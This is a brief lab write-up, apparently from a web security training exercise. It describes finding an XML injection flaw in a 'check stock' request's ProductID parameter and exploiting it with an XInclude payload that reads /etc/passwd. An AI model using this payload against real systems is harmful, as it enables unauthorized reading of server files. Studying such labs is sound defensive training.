We clicked the “check stock” button and got the POST request, scanned the selected insertion point as a new task, and were able to see that the ProductID parameter is vulnerable to XML Injection.
We edited the payload to include parse as “text” and show the file /etc/passwd, and were able to get the file content as the response and solve the lab:
<onz xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></onz>
